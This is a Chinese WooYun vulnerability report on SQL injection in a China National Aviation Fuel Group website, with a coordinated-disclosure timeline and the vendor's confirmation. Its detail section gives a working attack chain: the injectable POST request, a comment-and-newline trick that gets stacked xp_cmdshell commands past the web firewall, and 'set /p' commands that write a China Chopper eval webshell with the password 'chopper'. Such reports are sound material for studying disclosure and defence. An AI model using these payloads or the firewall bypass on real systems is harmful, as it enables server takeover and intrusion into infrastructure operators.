当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135564

漏洞标题:中国航空油料集团主站注入+getshell(无视web防御)

相关厂商:cncert国家互联网应急中心

漏洞作者: Msyb

提交时间:2015-08-26 11:08

修复时间:2015-10-13 09:34

公开时间:2015-10-13 09:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-08: 细节向核心白帽子及相关领域专家公开
2015-09-18: 细节向普通白帽子公开
2015-09-28: 细节向实习白帽子公开
2015-10-13: 细节向公众公开

简要描述:

中国航空油料集团公司是以原中国航空油料总公司为基础组建的国有大型航空运输服务保障企业,是国内最大的集航空油品采购、运输、储存、检测、销售、加注为一体的航油供应商,国务院授权的投资机构和国家控股公司试点企业,国务院国资委管理的中央企业。
  中国航油控股、参股20个海内外企业,构建了遍布全国的航油、成品油销售网络和完备的油品物流配送体系,在全国190 多个机场拥有供油设施,为全球200 多家航空客户提供航油加注服务,在25个省、市、自治区为民航及社会车辆提供汽柴油及石化产品的批发、零售、仓储及配送服务,在长三角、珠三角、环渤海湾和西南地区建有大型成品油及石化产品的物流储运基地。
  中国航油已成为亚洲第一大航油供应商。2015年7月,以2014年营业收入2229亿元荣登《财富》世界500 强第321位。中国航油2011年首次入榜,连续第五年榜上有名,历年排名为431, 318, 277, 314和321。

详细说明:

注入点:http://**.**.**.**/jiayou/changepwd.aspx
post注入data:__VIEWSTATE=%2FwEPDwULLTE2MzM3NTU1MDBkZF%2BhzShW4b%2FxFbARD41NUcd6YZ0o&__VIEWSTATEGENERATOR=23AEA91D&__EVENTVALIDATION=%2FwEWBgKIv5X9DgKvpuq2CALGmdGVDALZwZWBCALZwcHzAwKM54rGBoqLKXWTNcTC8oaPl8trcXPQKtKN&username=admin&pwd=111111&new=111111&new1=111111&Button1=%E7%A1%AE+%E8%AE%A4
参数username为过滤

1.PNG


于是慢慢把管理员账号密码搞了出来

4.PNG


5.PNG


用户名admin,密码看图。
后台在http://**.**.**.**/console/login.aspx
然而经过一番尝试,没拿到shell。
于是又回到注入点,发现可以执行命令
username=admin' ;--%0aexec--%0amaster.dbo.xp_cmdshell '命令'
直接exec会被拦截,然而并没有什么用
在后台系统设置,系统信息检测那里给出了网站物理路径为D:\cnaf\

222.PNG


于是直接用xp_cmdshell写shell

set /p="<%@ Page Language=" >>D:\cnaf\x.aspx
set /p=^" >>D:\cnaf\x.aspx
set /p="Jscrip" >>D:\cnaf\x.aspx
set /p="t" >>D:\cnaf\x.aspx
set /p=^" >>D:\cnaf\x.aspx
set /p="%><%eval(Request.Item["chopper"],"unsafe");%>" >>D:\cnaf\x.aspx


一句一句的放在--%0aexec--%0amaster.dbo.xp_cmdshell '里面'执行。
这里的关键是script会被拦截,所以直接echo不行,而且echo会强制换行,网上查半天也没搞定这个问题,最后才看到用set的方法。
然后拿到shell,http://**.**.**.**/x.aspx密码chopper
预览时我发现乌云把一个“\”变成两个\了,无语。

123.PNG


还有在我这台电脑上%必须改成%%才能输出,但注入那里好像就不用,不解
反正拿到shell了,有图为证!

7.PNG

漏洞证明:

2.PNG


3.PNG


http://**.**.**.**/x.aspx密码chopper

7.PNG

修复方案:

加强防御

版权声明:转载请注明来源 Msyb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-29 09:33

厂商回复:

CNVD确认并复现所述情况,转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-31 17:40 | 牛 小 帅 ( 普通白帽子 | Rank:483 漏洞数:117 | 茶凉了,就不要再续了,再续也不是原来的味...)

    66666